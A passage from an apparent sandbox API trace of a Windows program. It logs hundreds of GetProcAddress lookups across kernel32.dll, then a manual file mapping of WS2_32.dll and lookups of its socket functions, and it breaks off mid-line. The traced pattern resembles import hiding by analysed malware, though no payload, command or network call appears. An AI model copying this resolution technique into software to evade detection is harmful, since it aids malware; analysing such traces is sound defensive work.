lpProcName="CloseConsoleHandle") returned 0x76de7703 [0055.255] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0055.255] GetProcAddress (hModule=0x76d30000, lpProcName="ClosePrivateNamespace") returned 0x76d6095b [0055.255] GetProcAddress (hModule=0x76d30000, lpProcName="CloseProfileUserMapping") returned 0x76de0929 [0055.255] GetProcAddress (hModule=0x76d30000, lpProcName="CmdBatNotification") returned 0x76ddfb29 [0055.256] GetProcAddress (hModule=0x76d30000, lpProcName="CommConfigDialogA") returned 0x76dc7cb1 [0055.256] GetProcAddress (hModule=0x76d30000, lpProcName="CommConfigDialogW") returned 0x76dc7b9d [0055.256] GetProcAddress (hModule=0x76d30000, lpProcName="CompareCalendarDates") returned 0x76dd4507 [0055.256] GetProcAddress (hModule=0x76d30000, lpProcName="CompareFileTime") returned 0x76d41b25 [0055.256] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringA") returned 0x76d43c5a [0055.256] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0055.256] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringOrdinal") returned 0x76d60608 [0055.256] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0055.256] GetProcAddress (hModule=0x76d30000, lpProcName="ConnectNamedPipe") returned 0x76dc40fb [0055.257] GetProcAddress (hModule=0x76d30000, lpProcName="ConsoleMenuControl") returned 0x76de7cdb [0055.257] GetProcAddress (hModule=0x76d30000, lpProcName="ContinueDebugEvent") returned 0x76db8491 [0055.257] GetProcAddress (hModule=0x76d30000, lpProcName="ConvertCalDateTimeToSystemTime") returned 0x76dd443e [0055.257] GetProcAddress (hModule=0x76d30000, lpProcName="ConvertDefaultLocale") returned 0x76d5ce5e [0055.257] GetProcAddress (hModule=0x76d30000, lpProcName="ConvertFiberToThread") returned 0x76dc5580 [0055.257] GetProcAddress (hModule=0x76d30000, lpProcName="ConvertNLSDayOfWeekToWin32DayOfWeek") returned 0x76dd44d8 [0055.258] GetProcAddress (hModule=0x76d30000, lpProcName="ConvertSystemTimeToCalDateTime") returned 0x76dd4a9a [0055.258] GetProcAddress (hModule=0x76d30000, lpProcName="ConvertThreadToFiber") returned 0x76d6c031 [0055.258] GetProcAddress (hModule=0x76d30000, lpProcName="ConvertThreadToFiberEx") returned 0x76d6c049 [0055.258] GetProcAddress (hModule=0x76d30000, lpProcName="CopyContext") returned 0x76dcea89 [0055.258] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileA") returned 0x76d658e5 [0055.258] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExA") returned 0x76dbec51 [0055.258] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0055.258] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileTransactedA") returned 0x76dbecb9 [0055.259] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileTransactedW") returned 0x76dbeb9f [0055.259] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0055.259] GetProcAddress (hModule=0x76d30000, lpProcName="CopyLZFile") returned 0x76db77ee [0055.259] GetProcAddress (hModule=0x76d30000, lpProcName="CreateActCtxA") returned 0x76d6944c [0055.259] GetProcAddress (hModule=0x76d30000, lpProcName="CreateActCtxW") returned 0x76d49247 [0055.259] GetProcAddress (hModule=0x76d30000, lpProcName="CreateBoundaryDescriptorA") returned 0x76dc4871 [0055.259] GetProcAddress (hModule=0x76d30000, lpProcName="CreateBoundaryDescriptorW") returned 0x76d5ec09 [0055.260] GetProcAddress (hModule=0x76d30000, lpProcName="CreateConsoleScreenBuffer") returned 0x76de7881 [0055.260] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0055.260] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryExA") returned 0x76db9479 [0055.260] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryExW") returned 0x76db85c1 [0055.260] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryTransactedA") returned 0x76db94e2 [0055.261] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryTransactedW") returned 0x76db93c4 [0055.261] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0055.261] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0055.261] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExA") returned 0x76d6054f [0055.261] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0055.261] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0055.262] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFiber") returned 0x76d6bdd6 [0055.262] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFiberEx") returned 0x76d6bdf6 [0055.262] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0055.262] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingA") returned 0x76d45506 [0055.262] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingNumaA") returned 0x76dbbf94 [0055.263] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingNumaW") returned 0x76dc411b [0055.263] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0055.263] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileTransactedA") returned 0x76dbe9b1 [0055.263] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileTransactedW") returned 0x76dbdded [0055.263] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0055.263] GetProcAddress (hModule=0x76d30000, lpProcName="CreateHardLinkA") returned 0x76dcd8a9 [0055.264] GetProcAddress (hModule=0x76d30000, lpProcName="CreateHardLinkTransactedA") returned 0x76dcd918 [0055.264] GetProcAddress (hModule=0x76d30000, lpProcName="CreateHardLinkTransactedW") returned 0x76dcd801 [0055.264] GetProcAddress (hModule=0x76d30000, lpProcName="CreateHardLinkW") returned 0x76dcd618 [0055.264] GetProcAddress (hModule=0x76d30000, lpProcName="CreateIoCompletionPort") returned 0x76d5eef2 [0055.264] GetProcAddress (hModule=0x76d30000, lpProcName="CreateJobObjectA") returned 0x76dcd57b [0055.264] GetProcAddress (hModule=0x76d30000, lpProcName="CreateJobObjectW") returned 0x76d6c7fa [0055.264] GetProcAddress (hModule=0x76d30000, lpProcName="CreateJobSet") returned 0x76dcd54d [0055.265] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMailslotA") returned 0x76dbfa6c [0055.265] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMailslotW") returned 0x76dbf960 [0055.265] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMemoryResourceNotification") returned 0x76d4d337 [0055.265] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0055.265] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexExA") returned 0x76dc412b [0055.265] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexExW") returned 0x76dc413b [0055.265] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexW") returned 0x76d4424c [0055.265] GetProcAddress (hModule=0x76d30000, lpProcName="CreateNamedPipeA") returned 0x76dc1807 [0055.266] GetProcAddress (hModule=0x76d30000, lpProcName="CreateNamedPipeW") returned 0x76dc414b [0055.266] GetProcAddress (hModule=0x76d30000, lpProcName="CreatePipe") returned 0x76dc415b [0055.266] GetProcAddress (hModule=0x76d30000, lpProcName="CreatePrivateNamespaceA") returned 0x76dc48ed [0055.266] GetProcAddress (hModule=0x76d30000, lpProcName="CreatePrivateNamespaceW") returned 0x76d60a8d [0055.266] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0055.266] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessAsUserW") returned 0x76d6c9c5 [0055.266] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessInternalA") returned 0x76d5a4b7 [0055.267] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessInternalW") returned 0x76d53bf3 [0055.267] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0055.267] GetProcAddress (hModule=0x76d30000, lpProcName="CreateRemoteThread") returned 0x76dc416b [0055.267] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreA") returned 0x76d6d172 [0055.267] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExA") returned 0x76d604cf [0055.267] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0055.267] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0055.267] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSocketHandle") returned 0x76de74ca [0055.268] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkA") returned 0x76dbd6d1 [0055.268] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkTransactedA") returned 0x76dbd74e [0055.268] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkTransactedW") returned 0x76dbd62a [0055.268] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0055.268] GetProcAddress (hModule=0x76d30000, lpProcName="CreateTapePartition") returned 0x76dcd298 [0055.268] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0055.268] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpool") returned 0x76d6b032 [0055.268] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolCleanupGroup") returned 0x76d5eeb7 [0055.268] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolIo") returned 0x76d6adf4 [0055.269] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0055.269] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0055.269] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWork") returned 0x76d5ee45 [0055.269] GetProcAddress (hModule=0x76d30000, lpProcName="CreateTimerQueue") returned 0x76d6b020 [0055.269] GetProcAddress (hModule=0x76d30000, lpProcName="CreateTimerQueueTimer") returned 0x76d5f7eb [0055.269] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0055.269] GetProcAddress (hModule=0x76d30000, lpProcName="CreateWaitableTimerA") returned 0x76dc4c24 [0055.269] GetProcAddress (hModule=0x76d30000, lpProcName="CreateWaitableTimerExA") returned 0x76dc4a8d [0055.270] GetProcAddress (hModule=0x76d30000, lpProcName="CreateWaitableTimerExW") returned 0x76dc41a5 [0055.270] GetProcAddress (hModule=0x76d30000, lpProcName="CreateWaitableTimerW") returned 0x76d6bacb [0055.270] GetProcAddress (hModule=0x76d30000, lpProcName="CtrlRoutine") returned 0x76de6cc4 [0055.270] GetProcAddress (hModule=0x76d30000, lpProcName="DeactivateActCtx") returned 0x76d4545c [0055.270] GetProcAddress (hModule=0x76d30000, lpProcName="DebugActiveProcess") returned 0x76db80d4 [0055.270] GetProcAddress (hModule=0x76d30000, lpProcName="DebugActiveProcessStop") returned 0x76db84d5 [0055.270] GetProcAddress (hModule=0x76d30000, lpProcName="DebugBreak") returned 0x76dc41b5 [0055.270] GetProcAddress (hModule=0x76d30000, lpProcName="DebugBreakProcess") returned 0x76db8127 [0055.271] GetProcAddress (hModule=0x76d30000, lpProcName="DebugSetProcessKillOnExit") returned 0x76db814e [0055.271] GetProcAddress (hModule=0x76d30000, lpProcName="DefineDosDeviceA") returned 0x76dba80c [0055.271] GetProcAddress (hModule=0x76d30000, lpProcName="DefineDosDeviceW") returned 0x76dc41bf [0055.271] GetProcAddress (hModule=0x76d30000, lpProcName="DelayLoadFailureHook") returned 0x76ddec9d [0055.272] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteAtom") returned 0x76d5ce16 [0055.272] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFiber") returned 0x76d6b872 [0055.272] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0055.272] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileTransactedA") returned 0x76dbcbfb [0055.272] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileTransactedW") returned 0x76dbc139 [0055.272] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0055.272] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteTimerQueue") returned 0x76dce720 [0055.273] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteTimerQueueEx") returned 0x76d6063a [0055.273] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteTimerQueueTimer") returned 0x76d5f7d3 [0055.273] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteVolumeMountPointA") returned 0x76dcad75 [0055.273] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteVolumeMountPointW") returned 0x76dc41cf [0055.273] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0055.273] GetProcAddress (hModule=0x76d30000, lpProcName="DisableThreadLibraryCalls") returned 0x76d448e5 [0055.273] GetProcAddress (hModule=0x76d30000, lpProcName="DisableThreadProfiling") returned 0x76dced30 [0055.274] GetProcAddress (hModule=0x76d30000, lpProcName="DisconnectNamedPipe") returned 0x76dc41df [0055.274] GetProcAddress (hModule=0x76d30000, lpProcName="DnsHostnameToComputerNameA") returned 0x76db5c3d [0055.274] GetProcAddress (hModule=0x76d30000, lpProcName="DnsHostnameToComputerNameW") returned 0x76db5b8e [0055.274] GetProcAddress (hModule=0x76d30000, lpProcName="DosDateTimeToFileTime") returned 0x76d5effe [0055.274] GetProcAddress (hModule=0x76d30000, lpProcName="DosPathToSessionPathA") returned 0x76dc3f58 [0055.274] GetProcAddress (hModule=0x76d30000, lpProcName="DosPathToSessionPathW") returned 0x76dc3d5a [0055.274] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateConsoleHandle") returned 0x76de7723 [0055.274] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0055.274] GetProcAddress (hModule=0x76d30000, lpProcName="EnableThreadProfiling") returned 0x76dcecfe [0055.275] GetProcAddress (hModule=0x76d30000, lpProcName="EndUpdateResourceA") returned 0x76dd3d34 [0055.275] GetProcAddress (hModule=0x76d30000, lpProcName="EndUpdateResourceW") returned 0x76dd3ace [0055.275] GetProcAddress (hModule=0x76d30000, lpProcName="EnumCalendarInfoA") returned 0x76d69e70 [0055.275] GetProcAddress (hModule=0x76d30000, lpProcName="EnumCalendarInfoExA") returned 0x76dd510b [0055.275] GetProcAddress (hModule=0x76d30000, lpProcName="EnumCalendarInfoExEx") returned 0x76dc46c1 [0055.275] GetProcAddress (hModule=0x76d30000, lpProcName="EnumCalendarInfoExW") returned 0x76dc41ef [0055.275] GetProcAddress (hModule=0x76d30000, lpProcName="EnumCalendarInfoW") returned 0x76dc41ff [0055.275] GetProcAddress (hModule=0x76d30000, lpProcName="EnumDateFormatsA") returned 0x76dd51a1 [0055.276] GetProcAddress (hModule=0x76d30000, lpProcName="EnumDateFormatsExA") returned 0x76dd51cd [0055.276] GetProcAddress (hModule=0x76d30000, lpProcName="EnumDateFormatsExEx") returned 0x76dc46d1 [0055.276] GetProcAddress (hModule=0x76d30000, lpProcName="EnumDateFormatsExW") returned 0x76dc420f [0055.276] GetProcAddress (hModule=0x76d30000, lpProcName="EnumDateFormatsW") returned 0x76d69e40 [0055.276] GetProcAddress (hModule=0x76d30000, lpProcName="EnumLanguageGroupLocalesA") returned 0x76dd5218 [0055.276] GetProcAddress (hModule=0x76d30000, lpProcName="EnumLanguageGroupLocalesW") returned 0x76dc421f [0055.276] GetProcAddress (hModule=0x76d30000, lpProcName="EnumResourceLanguagesA") returned 0x76dc17e1 [0055.276] GetProcAddress (hModule=0x76d30000, lpProcName="EnumResourceLanguagesExA") returned 0x76dc1765 [0055.277] GetProcAddress (hModule=0x76d30000, lpProcName="EnumResourceLanguagesExW") returned 0x76dc1715 [0055.277] GetProcAddress (hModule=0x76d30000, lpProcName="EnumResourceLanguagesW") returned 0x76dc173f [0055.277] GetProcAddress (hModule=0x76d30000, lpProcName="EnumResourceNamesA") returned 0x76d6ab72 [0055.277] GetProcAddress (hModule=0x76d30000, lpProcName="EnumResourceNamesExA") returned 0x76d6ab95 [0055.277] GetProcAddress (hModule=0x76d30000, lpProcName="EnumResourceNamesExW") returned 0x76d6c767 [0055.277] GetProcAddress (hModule=0x76d30000, lpProcName="EnumResourceNamesW") returned 0x76db3161 [0055.277] GetProcAddress (hModule=0x76d30000, lpProcName="EnumResourceTypesA") returned 0x76dc0efd [0055.277] GetProcAddress (hModule=0x76d30000, lpProcName="EnumResourceTypesExA") returned 0x76dc0ed9 [0055.278] GetProcAddress (hModule=0x76d30000, lpProcName="EnumResourceTypesExW") returned 0x76dc0e95 [0055.278] GetProcAddress (hModule=0x76d30000, lpProcName="EnumResourceTypesW") returned 0x76dc0eb9 [0055.278] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemCodePagesA") returned 0x76dd5257 [0055.278] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemCodePagesW") returned 0x76dc422f [0055.278] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemFirmwareTables") returned 0x76dbf072 [0055.278] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemGeoID") returned 0x76dd5b1d [0055.278] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLanguageGroupsA") returned 0x76dd51fa [0055.278] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLanguageGroupsW") returned 0x76dc423f [0055.278] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesA") returned 0x76d6287b [0055.279] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0055.279] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0055.285] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0055.285] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0055.285] GetModuleFileNameW (in: hModule=0x77230000, lpFilename=0x18efd8, nSize=0x104 | out: lpFilename="C:\\Windows\\syswow64\\WS2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")) returned 0x1e [0055.285] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0055.285] CreateFileW (lpFileName="C:\\Windows\\syswow64\\WS2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0055.286] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0055.286] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0055.286] GetFileSize (in: hFile=0x14c, lpFileSizeHigh=0x18efcc | out: lpFileSizeHigh=0x18efcc*=0x0) returned 0x32800 [0055.286] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0055.286] CreateFileMappingW (hFile=0x14c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x150 [0055.287] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0055.287] MapViewOfFile (hFileMappingObject=0x150, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x32800) returned 0x2840000 [0055.288] GetProcAddress (hModule=0x77230000, lpProcName="FreeAddrInfoEx") returned 0x7723e14d [0055.288] GetProcAddress (hModule=0x77230000, lpProcName="FreeAddrInfoExW") returned 0x7723e14d [0055.289] GetProcAddress (hModule=0x77230000, lpProcName="FreeAddrInfoW") returned 0x77234b1b [0055.289] GetProcAddress (hModule=0x77230000, lpProcName="GetAddrInfoExA") returned 0x7724469b [0055.290] GetProcAddress (hModule=0x77230000, lpProcName="GetAddrInfoExW") returned 0x7723d1ea [0055.290] GetProcAddress (hModule=0x77230000, lpProcName="GetAddrInfoW") returned 0x77234889 [0055.290] GetProcAddress (hModule=0x77230000, lpProcName="GetNameInfoW") returned 0x772366af [0055.290] GetProcAddress (hModule=0x77230000, lpProcName="InetNtopW") returned 0x77243abf [0055.290] GetProcAddress (hModule=0x77230000, lpProcName="InetPtonW") returned 0x772439dc [0055.290] GetProcAddress (hModule=0x77230000, lpProcName="SetAddrInfoExA") returned 0x772445f7 [0055.291] GetProcAddress (hModule=0x77230000, lpProcName="SetAddrInfoExW") returned 0x7723f4f6 [0055.291] GetProcAddress (hModule=0x77230000, lpProcName="WEP") returned 0x7724e764 [0055.292] GetProcAddress (hModule=0x77230000, lpProcName="WPUCompleteOverlappedRequest") returned 0x7724e39b [0055.292] GetProcAddress (hModule=0x77230000, lpProcName="WSAAccept") returned 0x772368d6 [0055.292] GetProcAddress (hModule=0x77230000, lpProcName="WSAAddressToStringA") returned 0x7723331e [0055.292] GetProcAddress (hModule=0x77230000, lpProcName="WSAAddressToStringW") returned 0x77236cf6 [0055.292] GetProcAddress (hModule=0x77230000, lpProcName="WSAAdvertiseProvider") returned 0x77250509 [0055.293] GetProcAddress (hModule=0x77230000, lpProcName="WSAAsyncGetHostByAddr") returned 0x7724736b [0055.294] GetProcAddress (hModule=0x77230000, lpProcName="WSAAsyncGetHostByName") returned 0x7724726a [0055.294] GetProcAddress (hModule=0x77230000, lpProcName="WSAAsyncGetProtoByName") returned 0x7724744e [0055.294] GetProcAddress (hModule=0x77230000, lpProcName="WSAAsyncGetProtoByNumber") returned 0x7724754f [0055.294] GetProcAddress (hModule=0x77230000, lpProcName="WSAAsyncGetServByName") returned 0x772470a7 [0055.294] GetProcAddress (hModule=0x77230000, lpProcName="WSAAsyncGetServByPort") returned 0x772471ae [0055.294] GetProcAddress (hModule=0x77230000, lpProcName="WSAAsyncSelect") returned 0x7724b014 [0055.295] GetProcAddress (hModule=0x77230000, lpProcName="WSACancelAsyncRequest") returned 0x77247602 [0055.295] GetProcAddress (hModule=0x77230000, lpProcName="WSACancelBlockingCall") returned 0x77245343 [0055.295] GetProcAddress (hModule=0x77230000, lpProcName="WSACleanup") returned 0x77233c5f [0055.295] GetProcAddress (hModule=0x77230000, lpProcName="WSACloseEvent") returned 0x7723651f [0055.295] GetProcAddress (hModule=0x77230000, lpProcName="WSAConnect") returned 0x7723cc3f [0055.295] GetProcAddress (hModule=0x77230000, lpProcName="WSAConnectByList") returned 0x7724bfdd [0055.295] GetProcAddress (hModule=0x77230000, lpProcName="WSAConnectByNameA") returned 0x7724c8b6 [0055.296] GetProcAddress (hModule=0x77230000, lpProcName="WSAConnectByNameW") returned 0x7724c52f [0055.296] GetProcAddress (hModule=0x77230000, lpProcName="WSACreateEvent") returned 0x772364fb [0055.296] GetProcAddress (hModule=0x77230000, lpProcName="WSADuplicateSocketA") returned 0x772461b6 [0055.296] GetProcAddress (hModule=0x77230000, lpProcName="WSADuplicateSocketW") returned 0x77246128 [0055.296] GetProcAddress (hModule=0x77230000, lpProcName="WSAEnumNameSpaceProvidersA") returned 0x77249fc1 [0055.296] GetProcAddress (hModule=0x77230000, lpProcName="WSAEnumNameSpaceProvidersExA") returned 0x7724a021 [0055.297] GetProcAddress (hModule=0x77230000, lpProcName="WSAEnumNameSpaceProvidersExW") returned 0x7724a081 [0055.297] GetProcAddress (hModule=0x77230000, lpProcName="WSAEnumNameSpaceProvidersW") returned 0x7723d8d3 [0055.297] GetProcAddress (hModule=0x77230000, lpProcName="WSAEnumNetworkEvents") returned 0x772331b1 [0055.297] GetProcAddress (hModule=0x77230000, lpProcName="WSAEnumProtocolsA") returned 0x7724627f [0055.297] GetProcAddress (hModule=0x77230000, lpProcName="WSAEnumProtocolsW") returned 0x7723c8e1 [0055.297] GetProcAddress (hModule=0x77230000, lpProcName="WSAEventSelect") returned 0x7723648f [0055.297] GetProcAddress (hModule=0x77230000, lpProcName="WSAGetLastError") returned 0x772337ad [0055.297] GetProcAddress (hModule=0x77230000, lpProcName="WSAGetOverlappedResult") returned 0x77237489 [0055.298] GetProcAddress (hModule=0x77230000, lpProcName="WSAGetQOSByName") returned 0x77249b68 [0055.298] GetProcAddress (hModule=0x77230000, lpProcName="WSAGetServiceClassInfoA") returned 0x7724aa00 [0055.298] GetProcAddress (hModule=0x77230000, lpProcName="WSAGetServiceClassInfoW") returned 0x7724a849 [0055.298] GetProcAddress (hModule=0x77230000, lpProcName="WSAGetServiceClassNameByClassIdA") returned 0x7724a44d [0055.298] GetProcAddress (hModule=0x77230000, lpProcName="WSAGetServiceClassNameByClassIdW") returned 0x7724a651 [0055.298] GetProcAddress (hModule=0x77230000, lpProcName="WSAHtonl") returned 0x77243b24 [0055.298] GetProcAddress (hModule=0x77230000, lpProcName="WSAHtons") returned 0x77243c11 [0055.299] GetProcAddress (hModule=0x77230000, lpProcName="WSAInstallServiceClassA") returned 0x7724a981 [0055.299] GetProcAddress (hModule=0x77230000, lpProcName="WSAInstallServiceClassW") returned 0x7724a277 [0055.299] GetProcAddress (hModule=0x77230000, lpProcName="WSAIoctl") returned 0x77232fe7 [0055.299] GetProcAddress (hModule=0x77230000, lpProcName="WSAIsBlocking") returned 0x772453be [0055.299] GetProcAddress (hModule=0x77230000, lpProcName="WSAJoinLeaf") returned 0x7724ca7d [0055.299] GetProcAddress (hModule=0x77230000, lpProcName="WSALookupServiceBeginA") returned 0x7723a642 [0055.299] GetProcAddress (hModule=0x77230000, lpProcName="WSALookupServiceBeginW") returned 0x7723575a [0055.300] GetProcAddress (hModule=0x77230000, lpProcName="WSALookupServiceEnd") returned 0x77235239 [0055.300] GetProcAddress (hModule=0x77230000, lpProcName="WSALookupServiceNextA") returned 0x7723a27b [0055.300] GetProcAddress (hModule=0x77230000, lpProcName="WSALookupServiceNextW") returned 0x77234cbc [0055.300] GetProcAddress (hModule=0x77230000, lpProcName="WSANSPIoctl") returned 0x7723ef85 [0055.300] GetProcAddress (hModule=0x77230000, lpProcName="WSANtohl") returned 0x77243b24 [0055.300] GetProcAddress (hModule=0x77230000, lpProcName="WSANtohs") returned 0x77243c11 [0055.300] GetProcAddress (hModule=0x77230000, lpProcName="WSAPoll") returned 0x7724b0a5 [0055.301] GetProcAddress (hModule=0x77230000, lpProcName="WSAProviderCompleteAsyncCall") returned 0x77250b79 [0055.302] GetProcAddress (hModule=0x77230000, lpProcName="WSAProviderConfigChange") returned 0x7723c22e [0055.302] GetProcAddress (hModule=0x77230000, lpProcName="WSARecv") returned 0x77237089 [0055.302] GetProcAddress (hModule=0x77230000, lpProcName="WSARecvDisconnect") returned 0x77249dbd [0055.302] GetProcAddress (hModule=0x77230000, lpProcName="WSARecvFrom") returned 0x7723cba6 [0055.302] GetProcAddress (hModule=0x77230000, lpProcName="WSARemoveServiceClass") returned 0x7724a362 [0055.303] GetProcAddress (hModule=0x77230000, lpProcName="WSAResetEvent") returned 0x7723cdc3 [0055.303] GetProcAddress (hModule=0x77230000, lpProcName="WSASend") returned 0x77234406 [0055.303] GetProcAddress (hModule=0x77230000, lpProcName="WSASendDisconnect") returned 0x7724b281 [0055.303] GetProcAddress (hModule=0x77230000, lpProcName="WSASendMsg") returned 0x7724b3cb [0055.303] GetProcAddress (hModule=0x77230000, lpProcName="WSASendTo") returned 0x7724b30c [0055.303] GetProcAddress (hModule=0x77230000, lpProcName="WSASetBlockingHook") returned 0x7724543d [0055.304] GetProcAddress (hModule=0x77230000, lpProcName="WSASetEvent") returned 0x7723cdd4 [0055.304] GetProcAddress (hModule=0x77230000, lpProcName="WSASetLastError") returned 0x772337d9 [0055.304] GetProcAddress (hModule=0x77230000, lpProcName="WSASetServiceA") returned 0x7724aa92 [0055.304] GetProcAddress (hModule=0x77230000, lpProcName="WSASetServiceW") returned 0x7723f606 [0055.304] GetProcAddress (hModule=0x77230000, lpProcName="WSASocketA") returned 0x7723c82a [0055.304] GetProcAddress (hModule=0x77230000, lpProcName="WSASocketW") returned 0x77233cd3 [0055.304] GetProcAddress (hModule=0x77230000, lpProcName="WSAStartup") returned 0x77233ab2 [0055.304] GetProcAddress (hModule=0x77230000, lpProcName="WSAStringToAddressA") returned 0x7723ed31 [0055.305] GetProcAddress (hModule=0x77230000, lpProcName="WSAStringToAddressW") returned 0x77236ddd [0055.305] GetProcAddress (hModule=0x77230000, lpProcName="WSAUnadvertiseProvider") returned 0x77250643 [0055.305] GetProcAddress (hModule=0x77230000, lpProcName="WSAUnhookBlockingHook") returned 0x772454c1 [0055.305] GetProcAddress (hModule=0x77230000, lpProcName="WSAWaitForMultipleEvents") returned 0x7723650e [0055.305] GetProcAddress (hModule=0x77230000, lpProcName="WSApSetPostRoutine") returned 0x7724e546 [0055.305] GetProcAddress (hModule=0x77230000, lpProcName="WSCDeinstallProvider") returned 0x7724d775 [0055.306] GetProcAddress (hModule=0x77230000, lpProcName="WSCEnableNSProvider") returned 0x772493ac [0055.306] GetProcAddress (hModule=0x77230000, lpProcName="WSCEnumProtocols") returned 0x7723b8cf [0055.306] GetProcAddress 